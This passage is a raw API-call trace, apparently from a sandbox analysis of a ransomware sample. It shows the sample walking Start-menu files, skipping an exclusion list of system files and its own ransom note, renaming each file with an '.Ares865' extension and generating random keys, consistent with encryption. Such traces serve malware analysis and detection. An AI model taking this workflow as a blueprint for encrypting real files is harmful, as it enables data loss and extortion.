-1 [0067.872] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0067.872] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0067.872] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0067.872] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0067.872] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0067.872] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0067.872] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0067.872] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0067.872] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0067.872] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0067.872] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0067.872] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0067.872] lstrlenW (lpString="desktop.ini") returned 11 [0067.872] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Data Sources (ODBC).lnk") returned 83 [0067.872] lstrcpyW (in: lpString1=0x2cce478, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0067.872] lstrlenW (lpString="desktop.ini") returned 11 [0067.872] lstrlenW (lpString="Ares865") returned 7 [0067.872] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0067.872] lstrlenW (lpString=".dll") returned 4 [0067.872] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0067.872] lstrlenW (lpString=".lnk") returned 4 [0067.872] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0067.873] lstrlenW (lpString=".ini") returned 4 [0067.873] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0067.873] lstrlenW (lpString=".sys") returned 4 [0067.873] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0067.873] lstrlenW (lpString="desktop.ini") returned 11 [0067.873] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.Ares865") returned 79 [0067.873] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\desktop.ini"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0067.874] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.874] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1958) returned 1 [0067.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0067.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.874] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0067.875] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.875] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.875] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xab0, lpName=0x0) returned 0x120 [0067.875] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xab0) returned 0x190000 [0067.876] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0067.876] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.876] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3251f8 [0067.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x325310 [0067.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0067.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x325310 | out: hHeap=0x2b0000) returned 1 [0067.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0067.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3251f8 | out: hHeap=0x2b0000) returned 1 [0067.877] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.877] CloseHandle (hObject=0x120) returned 1 [0067.877] CloseHandle (hObject=0x12c) returned 1 [0067.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0067.878] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b8e0e72, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2b8e0e72, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x2b8e0e72, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x512, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Event Viewer.lnk", cAlternateFileName="EVENTV~1.LNK")) returned 1 [0067.878] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.878] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2="aoldtz.exe") returned 1 [0067.878] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2=".") returned 1 [0067.878] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2="..") returned 1 [0067.878] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2="windows") returned -1 [0067.878] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2="bootmgr") returned 1 [0067.878] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2="temp") returned -1 [0067.878] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2="pagefile.sys") returned -1 [0067.878] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2="boot") returned 1 [0067.878] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2="ids.txt") returned -1 [0067.878] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2="ntuser.dat") returned -1 [0067.878] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2="perflogs") returned -1 [0067.879] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2="MSBuild") returned -1 [0067.879] lstrlenW (lpString="Event Viewer.lnk") returned 16 [0067.879] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\desktop.ini") returned 71 [0067.879] lstrcpyW (in: lpString1=0x2cce478, lpString2="Event Viewer.lnk" | out: lpString1="Event Viewer.lnk") returned="Event Viewer.lnk" [0067.879] lstrlenW (lpString="Event Viewer.lnk") returned 16 [0067.879] lstrlenW (lpString="Ares865") returned 7 [0067.879] lstrcmpiW (lpString1="wer.lnk", lpString2="Ares865") returned 1 [0067.879] lstrlenW (lpString=".dll") returned 4 [0067.879] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2=".dll") returned 1 [0067.879] lstrlenW (lpString=".lnk") returned 4 [0067.879] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2=".lnk") returned 1 [0067.879] lstrlenW (lpString=".ini") returned 4 [0067.879] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2=".ini") returned 1 [0067.879] lstrlenW (lpString=".sys") returned 4 [0067.879] lstrcmpiW (lpString1="Event Viewer.lnk", lpString2=".sys") returned 1 [0067.879] lstrlenW (lpString="Event Viewer.lnk") returned 16 [0067.879] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk.Ares865") returned 84 [0067.879] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\event viewer.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\event viewer.lnk.ares865"), dwFlags=0x1) returned 1 [0067.880] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\event viewer.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.880] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1298) returned 1 [0067.880] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0067.881] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.881] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.881] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0067.882] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.882] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.882] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x164 [0067.883] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x190000 [0067.884] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0067.885] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.885] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0067.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0067.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.886] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.886] CloseHandle (hObject=0x164) returned 1 [0067.886] CloseHandle (hObject=0x12c) returned 1 [0067.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0067.886] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bbcba20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bbcba20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0067.886] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0067.886] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2725c230, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2725c230, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x272a84f0, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iSCSI Initiator.lnk", cAlternateFileName="ISCSII~1.LNK")) returned 1 [0067.886] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.886] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2="aoldtz.exe") returned 1 [0067.886] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2=".") returned 1 [0067.886] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2="..") returned 1 [0067.886] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2="windows") returned -1 [0067.886] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2="bootmgr") returned 1 [0067.886] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2="temp") returned -1 [0067.886] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2="pagefile.sys") returned -1 [0067.886] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2="boot") returned 1 [0067.886] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2="ids.txt") returned 1 [0067.886] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2="ntuser.dat") returned -1 [0067.886] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2="perflogs") returned -1 [0067.886] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2="MSBuild") returned -1 [0067.886] lstrlenW (lpString="iSCSI Initiator.lnk") returned 19 [0067.887] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk") returned 76 [0067.887] lstrcpyW (in: lpString1=0x2cce478, lpString2="iSCSI Initiator.lnk" | out: lpString1="iSCSI Initiator.lnk") returned="iSCSI Initiator.lnk" [0067.887] lstrlenW (lpString="iSCSI Initiator.lnk") returned 19 [0067.887] lstrlenW (lpString="Ares865") returned 7 [0067.887] lstrcmpiW (lpString1="tor.lnk", lpString2="Ares865") returned 1 [0067.887] lstrlenW (lpString=".dll") returned 4 [0067.887] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2=".dll") returned 1 [0067.887] lstrlenW (lpString=".lnk") returned 4 [0067.887] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2=".lnk") returned 1 [0067.887] lstrlenW (lpString=".ini") returned 4 [0067.887] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2=".ini") returned 1 [0067.887] lstrlenW (lpString=".sys") returned 4 [0067.887] lstrcmpiW (lpString1="iSCSI Initiator.lnk", lpString2=".sys") returned 1 [0067.887] lstrlenW (lpString="iSCSI Initiator.lnk") returned 19 [0067.887] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk.Ares865") returned 87 [0067.887] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\iscsi initiator.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\iscsi initiator.lnk.ares865"), dwFlags=0x1) returned 1 [0067.889] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\iscsi initiator.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.889] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1274) returned 1 [0067.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.889] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0067.890] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.890] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.890] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x164 [0067.892] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x190000 [0067.893] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0067.893] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.893] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.893] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.893] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.893] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.893] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.893] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.894] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.894] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0067.894] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.894] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0067.894] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.894] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.894] CloseHandle (hObject=0x164) returned 1 [0067.894] CloseHandle (hObject=0x12c) returned 1 [0067.894] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.894] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.894] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.894] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa38693b, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xa38693b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0xa3aca9c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Memory Diagnostics Tool.lnk", cAlternateFileName="MEMORY~1.LNK")) returned 1 [0067.894] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.894] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2="aoldtz.exe") returned 1 [0067.894] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2=".") returned 1 [0067.894] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2="..") returned 1 [0067.894] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2="windows") returned -1 [0067.895] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2="bootmgr") returned 1 [0067.895] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2="temp") returned -1 [0067.895] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2="pagefile.sys") returned -1 [0067.895] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2="boot") returned 1 [0067.895] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2="ids.txt") returned 1 [0067.895] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2="ntuser.dat") returned -1 [0067.895] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2="perflogs") returned -1 [0067.895] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2="MSBuild") returned -1 [0067.895] lstrlenW (lpString="Memory Diagnostics Tool.lnk") returned 27 [0067.895] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk") returned 79 [0067.895] lstrcpyW (in: lpString1=0x2cce478, lpString2="Memory Diagnostics Tool.lnk" | out: lpString1="Memory Diagnostics Tool.lnk") returned="Memory Diagnostics Tool.lnk" [0067.895] lstrlenW (lpString="Memory Diagnostics Tool.lnk") returned 27 [0067.895] lstrlenW (lpString="Ares865") returned 7 [0067.895] lstrcmpiW (lpString1="ool.lnk", lpString2="Ares865") returned 1 [0067.895] lstrlenW (lpString=".dll") returned 4 [0067.895] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2=".dll") returned 1 [0067.895] lstrlenW (lpString=".lnk") returned 4 [0067.895] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2=".lnk") returned 1 [0067.895] lstrlenW (lpString=".ini") returned 4 [0067.895] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2=".ini") returned 1 [0067.895] lstrlenW (lpString=".sys") returned 4 [0067.895] lstrcmpiW (lpString1="Memory Diagnostics Tool.lnk", lpString2=".sys") returned 1 [0067.895] lstrlenW (lpString="Memory Diagnostics Tool.lnk") returned 27 [0067.895] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk.Ares865") returned 95 [0067.895] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\memory diagnostics tool.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\memory diagnostics tool.lnk.ares865"), dwFlags=0x1) returned 1 [0067.896] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\memory diagnostics tool.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.897] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1268) returned 1 [0067.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.897] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0067.898] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.898] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.898] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x118 [0067.899] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x190000 [0067.900] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0067.900] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.900] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.901] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.901] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.901] RtlAllocateHeap (HeapHandle=0x2b0000, 